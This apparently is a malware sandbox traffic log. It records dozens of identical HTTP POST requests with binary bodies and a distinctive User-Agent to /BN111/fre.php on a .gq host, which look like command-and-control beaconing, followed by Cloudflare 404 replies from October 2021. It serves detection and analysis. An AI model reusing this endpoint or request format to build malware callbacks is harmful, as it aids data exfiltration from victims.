                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:19 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tc%2BH09Yr5HaypHMlBF4iUDG3nhys2pPE4zSX4LGjecWNJzGpM%2B99gDFRrUNEMRf3eoe2rHO1C%2BujLeyZYYPL6AvWl4cI4PR4ssIE72e%2BnJtPmjJiBKaVLXSCw8d0%2BL7Ql8nO18QK89ttl7gsAcZIK9ns5%2B1G5A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debf331c2f691f-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:20 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hQkFe3UJ1QmCzUsZUQlHGGa3jv5VhF59kyHL%2FAsWX3Cle1Hp0JGwG2RiPxylz6fXh7eYHqVnm1Viov8%2Fg8G0zh1TwiCsMn%2BxPOnxpZErkhdqFG1ph3AcJYoYgnYYS96tyPBQDWnFXqoyO4YpwFfZSNVBuZc%2BQw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debf3b3ba57057-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:21 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gywdBNFWVFKIiZY3FEiKOzs84VMPVYr0KsnkFxu9YBLF66h9wh5gFt%2BKvxTgQoptbBobPo4zo%2FqKzOkAcdBuhuoMMrcjb2wrOtLU4%2BScQPJGN05F5R8f5lBn8MTmqMmHsvXJe26qCeRgvef6Z2NcGbvmdK2vnQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debf4179ac16e6-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:22 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rIV1TCFtSps327NCu2VLT4v29yYPaf8k0h8mWGTLoJdR4ctIDPvXYKYGHAiiR70AaLpuz4o3vkmUXm72wLswxeU23M%2BVnkrC6oouZxiAyBfAU%2B7srHMGXyKvERWjs%2FICV8ZBHL3aKPib3xMytSdkecNOp%2BGqKQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debf493e674e9d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:23 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5wgGIaVyqpazjweKVSLXwiCkN75Ifsmvy1yNZb2HaTGFvj97QAK7byh9rdPZijXBS8IE2ZBG%2FYRIB4fcQZc0542rQ1bDIXwKO%2FyT7rfH3BOzsIfhWyfBIdPcSEdN3h0udKSLVpVjCxXslaXSnf%2Bcj8Aw4JtpmA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debf50b8e24de8-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:25 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TUPKE8D4UGkHYeoSd0yWKGHpiVyKRj77CORXDe0%2F1O83cFqfjhqZ0VrDKDJl5PNFM1d7k7a%2BakFbs2fwMXUXRPnpAD93uQfrQNlF5%2B5FUNRmWTFz4Fi75GfzaL9mPeByBQ%2BOUK4b0qNxYwgtN4fwhqW64C7hPA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debf578ab14e5c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:26 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NBl2laSVW7g6vrcMW38%2F2YBxeOPQrkwxtPhBgARwSEgAQNN%2Fw9iGGS%2FMcVDd5bsPKDfZf7F34jWKWukgO%2BC6zW4jkS8RqojfmfBcKo9bpy3LJAKlcTfInQaxeHYOzrjAYApe5O2EWJUMAr1uyWTrEaztAHnaRg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debf5eafe9695b-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:27 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OvCReYL5kOGzCHk1X2inrDg3LE1il6%2B7FTgD%2FXIswLKX9fCBRgXz9DRTR%2BULHUkhSfhznG6alUky58mQbc1ir%2ByqnxuDkYKD854tu9UOoiYexIWXj8lJVJPVQ2nEQja6fVQg5wAHAZeKEplbfNmZMMqLBlJM6A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debf66ec32692b-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:30 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0Hk46wdoG1U27nz707h6QtW1GUw2h6o9OisNkyhB2aYUTsS7ahwfcM37s0X%2BXm8zCJMTqINkuUnoOUc6RiTwkeUHqopnJbQ82UpWA9CyU9N%2BqKVbZ2JX9RAD3Z5d9c3nY2pdXuQ2K39C%2BMU9nFo%2Bj20Dqe22SQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debf795ca042e1-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:31 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xk4891DLaBXXjT1FhSY5vGjPMlx7%2FPwKsYbmlt3n3G5MwqOiF37%2FMqhNAZ9k%2FwEIMsJstsiC5k0UvsMw0imxbeYrZlZTQ1lGsg9Eox%2BRhZh7Mbe51awkrb53qeX5Jtjag4OXYQUnQ2SLmWUAhH7J7El0v%2F1uGA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debf804c5d4eb0-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:32 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PsyKz23oumG1N2Qa6W82cL6U9NuCNhNUuC%2FZVgvvwW%2BDV3gzbbFfzB3%2BNtArLcKJk6RAdkcWIb70IWH9c1BU5tnjxYGlq1KaEkpgcFVk3A%2FjDdAOS0gYz6ayeBdJqQBA9VqH4EPLTxPN245tSgs%2BJ6qZbgIytw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debf873cad5c62-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:33 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=H68GrAIUZ61ik30eQPT7ieOnffpsCaIqd%2B20QY25W3jNlrWDPyTlhkKHRfJS%2FiUtwct9SjTEfhD8iO%2B5yucBGT673jWQTRVTfa6kc7%2Fx89CXhw5%2Fm91Iu3OgHm5JHlTRSAOWIMlJ6872pwxceJSRHYfcODJ2aQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debf8e7a2f2b65-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
